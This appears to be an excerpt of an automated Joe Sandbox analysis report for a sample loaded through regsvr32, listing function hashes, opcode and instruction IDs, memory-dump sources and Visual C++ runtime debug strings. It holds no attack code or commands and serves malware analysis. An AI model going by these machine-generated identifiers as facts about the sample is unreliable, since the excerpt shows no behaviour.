                                                                                                                                            • Instruction Fuzzy Hash: 3B217BB16187858BC748DF28C55951ABBE1FBCC318F404B5DF8CAAA360D378D645CB4A
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Hk
                                                                                                                                            • API String ID: 0-2736353058
                                                                                                                                            • Opcode ID: f042022579c6dc077ee2635b55382d47991fd87e705928ebfd6682ca687bc5a7
                                                                                                                                            • Instruction ID: 887fdeaeec6620913bccc1519bb94b7ab545cc472d3a2f82c737665b3ebe67cb
                                                                                                                                            • Opcode Fuzzy Hash: f042022579c6dc077ee2635b55382d47991fd87e705928ebfd6682ca687bc5a7
                                                                                                                                            • Instruction Fuzzy Hash: 20319CB4628384AB8388DF28C49981ABBF1FBC9304F806A1DF8868A260D775D445CB03
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @Bp!
                                                                                                                                            • API String ID: 0-2853746471
                                                                                                                                            • Opcode ID: ef82bde12d532e04876809b878463bf9d85bf8adc7e5172117a9a71904663532
                                                                                                                                            • Instruction ID: a42def5e4906ba5408d95fb28ee36c9633a666dd8c6a1d0dabe2f17b10b73553
                                                                                                                                            • Opcode Fuzzy Hash: ef82bde12d532e04876809b878463bf9d85bf8adc7e5172117a9a71904663532
                                                                                                                                            • Instruction Fuzzy Hash: 8831F37080034E8BCB44DF64D48A4DE7FB0FB28398F11461AE869A6210D3B48694CFC5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: _&%
                                                                                                                                            • API String ID: 0-276555772
                                                                                                                                            • Opcode ID: 8f3b61786a1347c07c3d5db82c2bc2daa848de2eab2d644bf824955350391771
                                                                                                                                            • Instruction ID: 84b034befa84842a6d26d9f5413634863003efd6eec9a48b68f2958c9e87747a
                                                                                                                                            • Opcode Fuzzy Hash: 8f3b61786a1347c07c3d5db82c2bc2daa848de2eab2d644bf824955350391771
                                                                                                                                            • Instruction Fuzzy Hash: C3217BB06187848B8748DF28D45A51ABBE1FBCC308F404B5DF4CAAA360D3789609CB4A
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: V
                                                                                                                                            • API String ID: 0-2990084971
                                                                                                                                            • Opcode ID: 1782258294aa137d61fe32651e2643f77913c71ff09afc5f450ca4bece25d7e7
                                                                                                                                            • Instruction ID: 19a784c3393b647e1d02845cf9d1e0035701b9012461bc7b4b972f754d4b287b
                                                                                                                                            • Opcode Fuzzy Hash: 1782258294aa137d61fe32651e2643f77913c71ff09afc5f450ca4bece25d7e7
                                                                                                                                            • Instruction Fuzzy Hash: E021ADB4529780AFD788DF28D09981FBBF0FB89304F806A1CF9868B360E3759445CB02
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: fe_
                                                                                                                                            • API String ID: 0-1346747655
                                                                                                                                            • Opcode ID: 656de1a6cae0373b094f44c9878c04d225c006d82b161423a6aec508986bcc20
                                                                                                                                            • Instruction ID: 9f8913945123cb4278df7be958afc5fc5d749fa594805d3e5c5ffa2821aade6f
                                                                                                                                            • Opcode Fuzzy Hash: 656de1a6cae0373b094f44c9878c04d225c006d82b161423a6aec508986bcc20
                                                                                                                                            • Instruction Fuzzy Hash: 25215DB55183818B9348EF28D44A51BBBE1BB8D34CF404B5DF4CEAA260D778D615CF4A
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 690f928848312d3e50bce6c98363679f754364b802b69089bfd2d1cc95353951
                                                                                                                                            • Instruction ID: f4bbdddc4ebc6fe898ddfb3184844cd7ab88b5746f894e32bccfd4327ba112cf
                                                                                                                                            • Opcode Fuzzy Hash: 690f928848312d3e50bce6c98363679f754364b802b69089bfd2d1cc95353951
                                                                                                                                            • Instruction Fuzzy Hash: F751247152078DABDBC9DF28C8CAA9C3BA1FB44754F806219FC468A261D774D5C9CB41
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a7876522931334601bd90a80625b7f157024bfeead9eee4300288ec184fcbc12
                                                                                                                                            • Instruction ID: d7e3191637b78f1be9ff87ab698ad538cd7d2d45c46478ba59590cd585685a95
                                                                                                                                            • Opcode Fuzzy Hash: a7876522931334601bd90a80625b7f157024bfeead9eee4300288ec184fcbc12
                                                                                                                                            • Instruction Fuzzy Hash: 5761B1B490078E8FCF48DF68D8595DE7BB0FB48318F014A19FC6696250D7B49A25CB84
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 88e65efb6d3fa20939ff192da4dfa840d39aac14346873756c43568c41f67993
                                                                                                                                            • Instruction ID: f17689cc06c9532d3252f7dc5abd3373f404a3f8166a5e21e79f0a6996b359c5
                                                                                                                                            • Opcode Fuzzy Hash: 88e65efb6d3fa20939ff192da4dfa840d39aac14346873756c43568c41f67993
                                                                                                                                            • Instruction Fuzzy Hash: 0B41B870608B488FC768DF19D08976ABBF1FB89711F40856EE68AC7351DB319848CB82
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 485b6be602952e656e1e94650c6f168335af82f45d0d0f5b4aa22a8c646e7c56
                                                                                                                                            • Instruction ID: 9422144e28ecc4a9930a11d21f18f8515329dd70f686b1b52883d16e1825d5f7
                                                                                                                                            • Opcode Fuzzy Hash: 485b6be602952e656e1e94650c6f168335af82f45d0d0f5b4aa22a8c646e7c56
                                                                                                                                            • Instruction Fuzzy Hash: 2A414D34509B588FD768DF28918A75ABBE0FF99310F004A5EE58EC7362D770D949CB82
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c92699b14e6c2b4fd34943bfb19e45adab91cb197e26a720392e823bcd093906
                                                                                                                                            • Instruction ID: bbd244a3cf3555809e115011e05a98a3e8d5fd40b217627e69400f11bfb30a94
                                                                                                                                            • Opcode Fuzzy Hash: c92699b14e6c2b4fd34943bfb19e45adab91cb197e26a720392e823bcd093906
                                                                                                                                            • Instruction Fuzzy Hash: 745193B590434ACFCF48CF64D48A5CE7FB0FB68398F214219E856A6250D3B496A4CFD5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 22d6ccee6f38bff831197d2bb081fadbeca5e8b7e3ae62232a51f5952ffcfbdb
                                                                                                                                            • Instruction ID: 8b5374169f69602128bd3032aff790cb1f354843cf4962b6e845d1f3af7287dc
                                                                                                                                            • Opcode Fuzzy Hash: 22d6ccee6f38bff831197d2bb081fadbeca5e8b7e3ae62232a51f5952ffcfbdb
                                                                                                                                            • Instruction Fuzzy Hash: 9741A0B180078E8BCB44CFA8D84A5DE7BF0FB18358F104A19F865A6250D3B89668CF94
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c574afae7ba18edac7d834e0abd82c8c7458f2e927091ead9319fe9aa7316d5f
                                                                                                                                            • Instruction ID: c15f1aaae4e4e13c906589d5588e8395ab5dda45948680e718f465f07a8a5b6e
                                                                                                                                            • Opcode Fuzzy Hash: c574afae7ba18edac7d834e0abd82c8c7458f2e927091ead9319fe9aa7316d5f
                                                                                                                                            • Instruction Fuzzy Hash: EC41C4B190038E8FDF48CF64C84A4DE7BB0FB58358F104619E86AA7250D3B8D665CF95
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 4afcbbeb8beafd70164a818e9f41371ad943d797e3468922fcea1c7c9f2e7631
                                                                                                                                            • Instruction ID: c896a4b3abc40741a1500648b31ed7fd3e584cfdc10005e9d212c87c64feccae
                                                                                                                                            • Opcode Fuzzy Hash: 4afcbbeb8beafd70164a818e9f41371ad943d797e3468922fcea1c7c9f2e7631
                                                                                                                                            • Instruction Fuzzy Hash: 2541C1B181035E8BDB48CFA8D48A5DE7FB0FB68398F204619E855A6214D3B496A4CFC5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 6edc2e1e82c131bcdf0495892124b6f46e3b6b242b9e6d8eacab558a4eb6cfc8
                                                                                                                                            • Instruction ID: db142853bc0ceb5379a440845187b42230294cb0dc3411c083ed269e5703ce5c
                                                                                                                                            • Opcode Fuzzy Hash: 6edc2e1e82c131bcdf0495892124b6f46e3b6b242b9e6d8eacab558a4eb6cfc8
                                                                                                                                            • Instruction Fuzzy Hash: E831AFB090034E8FCB48CF68C4865DE7FB0FB58398F114219E85AA6210D3B496A5CFC5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 6c455d63c0866516b303eef6870e820fc06907d5cf01b5e138b1643b6a977dfc
                                                                                                                                            • Instruction ID: 032a8ed253072f6fd1b05e82d0325949fdf78283cb4c6b9cd1929990fdaa7975
                                                                                                                                            • Opcode Fuzzy Hash: 6c455d63c0866516b303eef6870e820fc06907d5cf01b5e138b1643b6a977dfc
                                                                                                                                            • Instruction Fuzzy Hash: F93195B050078A8BCF48DF68C85A5AE3BB1FB48308B404A2DFD269A350D7B49664CB84
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 91382f82a540e9ea2bbfb40e05a393f87671ab464d1f075959bb3f3378a52dce
                                                                                                                                            • Instruction ID: 9b1437c5de0cc84ebb9c914bb54d42d7cbbf0eefc466e3cb3beb54b329be6ed5
                                                                                                                                            • Opcode Fuzzy Hash: 91382f82a540e9ea2bbfb40e05a393f87671ab464d1f075959bb3f3378a52dce
                                                                                                                                            • Instruction Fuzzy Hash: E631D5B190034E8FCF48DF68C48A4DE7FB1FB68398F100619E816A6250D3B896A4CFC5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 76bccbb128cfcb22620bb2b416fc3ca44309eaef87c6278072ef16f6a50a05e8
                                                                                                                                            • Instruction ID: e5161e45e20286f18a7c233b2d95f7c6d50d739ad8bc374cfda940a225cf7d0d
                                                                                                                                            • Opcode Fuzzy Hash: 76bccbb128cfcb22620bb2b416fc3ca44309eaef87c6278072ef16f6a50a05e8
                                                                                                                                            • Instruction Fuzzy Hash: DD315C305187849BC3999B24C4C925EBEE1FB85399FA0682CF1C3C6264D774C98A8B06
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 33d7533839bea32518041b6ca5f29ea3ef2f9d4ceb6278032ee9dcaf63ac5804
                                                                                                                                            • Instruction ID: e62117077ddfbae32c834d069a9ab80343e2b26cefae081dcf738b8df2b77597
                                                                                                                                            • Opcode Fuzzy Hash: 33d7533839bea32518041b6ca5f29ea3ef2f9d4ceb6278032ee9dcaf63ac5804
                                                                                                                                            • Instruction Fuzzy Hash: B22148B56183848BD749DF28D44A41ABBE1FB9C74CF400B6DF4CAAB250D378D649CB4A
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 8ecf74b073e9749c9a707f8928f85ed0a2f8ff40eefc5cc2f6539f01074e035d
                                                                                                                                            • Instruction ID: 503aa3927fff6e4ad3ec536c6aa42fcab205a0bd32951b21a7cd1c91f46ab624
                                                                                                                                            • Opcode Fuzzy Hash: 8ecf74b073e9749c9a707f8928f85ed0a2f8ff40eefc5cc2f6539f01074e035d
                                                                                                                                            • Instruction Fuzzy Hash: 3F2150B46187848BD748DF28C45641ABBE1FB9C358F804B2DF4CAA7350D7789A05CF4A
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 9daa26d15846afd04c30d9d8c23f2645a3612f544d511007b76009de9b77635d
                                                                                                                                            • Instruction ID: bec49874bf3906a1a9314e610e6330a75ea1af3aa415f07e7967bd5f7b72e726
                                                                                                                                            • Opcode Fuzzy Hash: 9daa26d15846afd04c30d9d8c23f2645a3612f544d511007b76009de9b77635d
                                                                                                                                            • Instruction Fuzzy Hash: 61215CB16187848BD748DF28D05941FBBE0BB8D358F405B2DF8CAA6351D7789644CB4A
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invoke_watson_if_error$DebugOutputString$_invoke_watson_if_oneof$_itow_s_unlock_wcsftime_l
                                                                                                                                            • String ID: %s(%d) : %s$(*_errno())$, Line $<file unknown>$Assertion failed!$Assertion failed: $Second Chance Assertion Failed: File $_CrtDbgReport: String too long or IO Error$_CrtDbgReport: String too long or Invalid characters in String$_VCrtDbgReportA$_itoa_s(nLine, szLineMessage, 4096, 10)$e = mbstowcs_s(&ret, szOutMessage2, 4096, szOutMessage, ((size_t)-1))$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrptt.c$strcat_s(szLineMessage, 4096, "\n")$strcat_s(szLineMessage, 4096, "\r")$strcat_s(szLineMessage, 4096, szUserMessage)$strcpy_s(szLineMessage, 4096, szFormat ? "Assertion failed: " : "Assertion failed!")$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")$strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")$wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")$6o$Pl
                                                                                                                                            • API String ID: 242677333-579931786
                                                                                                                                            • Opcode ID: 90fb5dc47a0cb7e52882a682e6518eda47d2e5e2933cc617357387334d7819cd
                                                                                                                                            • Instruction ID: c39a97d5544ae6f9b3a89d8b8442b311626a988b35ec11bed69e1898881db9bb
                                                                                                                                            • Opcode Fuzzy Hash: 90fb5dc47a0cb7e52882a682e6518eda47d2e5e2933cc617357387334d7819cd
                                                                                                                                            • Instruction Fuzzy Hash: 2332193290CA9AD5E7348F10E8543EE7360FB88B45FA00935D68D46AD9DF7DE149CBA0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invoke_watson_if_error$FileModuleName
                                                                                                                                            • String ID: For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts.$File: $Line: $Module: $(*_errno())$...$<program name unknown>$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Expression: $Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowW$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrpt.c$memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)$wcscpy_s(szExeName, 260, L"<program name unknown>")$wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")
                                                                                                                                            • API String ID: 1949418964-1840610800
                                                                                                                                            • Opcode ID: 44b701395b3347ba89d33a25413c6d043cef3cadf6afd38b3a3e0c178ea01b00
                                                                                                                                            • Instruction ID: 4752bbe4ea93dab49c1abd6daf9d049fb749ba7b0cd6e93e9ee769ba8748ad6d
                                                                                                                                            • Opcode Fuzzy Hash: 44b701395b3347ba89d33a25413c6d043cef3cadf6afd38b3a3e0c178ea01b00
                                                                                                                                            • Instruction Fuzzy Hash: 7EF1E97250CBDAE4E6348F50F5443AAB3A4FB88B84F604936D68D427A9DF7DD144CB20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invoke_watson_if_error$_invalid_parameter
                                                                                                                                            • String ID: For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts.$File: $Line: $Module: $(*_errno())$...$<program name unknown>$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Expression: $Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowA$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrpt.c$memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)$strcpy_s(szExeName, 260, "<program name unknown>")$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")$m*
                                                                                                                                            • API String ID: 2356156361-2279852085
                                                                                                                                            • Opcode ID: 2e784d19664e5a95b58b990f67b4737f05373876c1930d3c64995b1a0c69d3f2
                                                                                                                                            • Instruction ID: 97b51c141217733a34926d21511e8e2eb8dcf8baf96cc0c4ea80ccff5a4cb1af
                                                                                                                                            • Opcode Fuzzy Hash: 2e784d19664e5a95b58b990f67b4737f05373876c1930d3c64995b1a0c69d3f2
                                                                                                                                            • Instruction Fuzzy Hash: F6C1E87650CBDAE1E7348F11E4803EAA3A1FB88B84F604936D68D42BA9DF3DD155CB50
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
